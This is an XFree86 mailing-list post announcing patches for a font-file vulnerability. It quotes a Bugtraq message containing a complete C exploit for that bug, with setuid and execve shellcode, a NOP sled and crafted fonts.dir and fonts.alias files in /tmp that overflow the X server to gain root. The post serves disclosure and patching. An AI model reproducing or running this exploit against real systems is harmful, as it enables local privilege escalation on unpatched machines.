Patches for this and related vulnerabilities have been committed to all of the release branches of the XFree86 CVS repository, and to the trunk. A source patch relative to 4.3.0.1 can be found at <ftp://ftp.xfree86.org/pub/XFree86/4.3.0/fixes/fontfile.diff>. Once things have settled, I'm planning to add snapshot tags to each branch. This will give a set of definite version numbers where this is fixed. David -- http://www.XFree86.org/~dawes On Thu, Feb 12, 2004 at 04:50:51PM -0500, Scott Gifford wrote: >This was posted on Bugtraq earlier today, and I thought it might be of >interest here. > > >From: Bender <bender2@xxxxxxxxxxxxxxxx> >Subject: XFree86 vulnerability exploit >To: bugtraq@xxxxxxxxxxxxxxxxx >Date: Wed, 11 Feb 2004 11:09:00 +0000 > >Hello > >Below you can find a exploit for latest bug in XFree86 sofware. >Tested on some versions of RedHat Linux (mainly 7.0). > >regards >Bender > >/* For educational purposes only */ >/* Brought to you by bender2@xxxxxxxxxxxx 11.10.2004 */ > >#include <fcntl.h> > >#define NOPNUM 8000 >#define ADRNUM 1058 > >/* shellcode from LSD */ >char setuidcode[]= /* 8 bytes */ > "\x33\xc0" /* xorl %eax,%eax */ > "\x31\xdb" /* xorl %ebx,%ebx */ > "\xb0\x17" /* movb $0x17,%al */ > "\xcd\x80" /* int $0x80 */ >; > >char shellcode[]= /* 24 bytes */ > "\x31\xc0" /* xorl %eax,%eax */ > "\x50" /* pushl %eax */ > "\x68""//id" /* pushl $0x68732f2f */ > "\x68""/tmp" /* pushl $0x6e69622f */ > "\x89\xe3" /* movl %esp,%ebx */ > "\x50" /* pushl %eax */ > "\x53" /* pushl %ebx */ > "\x89\xe1" /* movl %esp,%ecx */ > "\x99" /* cdql */ > "\xb0\x0b" /* movb $0x0b,%al */ > "\xcd\x80" /* int $0x80 */ >; > >char jump[]= > "\x8b\xc4" /* movl %esp,%eax */ > "\xc3" /* ret */ >; > > >main(int argc,char **argv){ > char buffer[20000],adr[4],pch[4],*b,*envp[4]; > int i,fd; > > > *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+16000; > > envp[0]=&buffer[2000]; > envp[1]=0; > > printf("adr: 0x%x\n",adr+12000); > > b=buffer; > strcpy(buffer,"1\n"); > strcat(buffer,"aaaa.pcf -aaaa-fixed-small-a-semicondensed--1-1-1-1-a-1-iso1111-1\n"); > fd=open("/tmp/fonts.dir",O_CREAT|O_WRONLY,0666); > write(fd,buffer,strlen(buffer)); > > for(i=0;i<ADRNUM;i++) *b++=adr[i%4]; > *b++='\n'; > > fd=open("/tmp/fonts.alias",O_CREAT|O_WRONLY,0666); > write(fd,buffer,strlen(buffer)); > close(fd); > > b=&buffer[2000]; > >for(i=0;i<NOPNUM-strlen(setuidcode)-strlen(setuidcode)-strlen(shellcode);i++) >*b++=0x90; > for(i=0;i<strlen(setuidcode);i++) *b++=setuidcode[i]; > for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i]; > *b=0; > > execle("/usr/bin/X11/X","X",":0","-fp","/tmp",0,envp); >} > > -- >bender2@xxxxxxxxxxxxxxxx >SDF Public Access UNIX System - http://sdf.lonestar.org >_______________________________________________ >XFree86 mailing list >XFree86@xxxxxxxxxxx >http://XFree86.Org/mailman/listinfo/xfree86 > _______________________________________________ XFree86 mailing list XFree86@xxxxxxxxxxx http://XFree86.Org/mailman/listinfo/xfree86
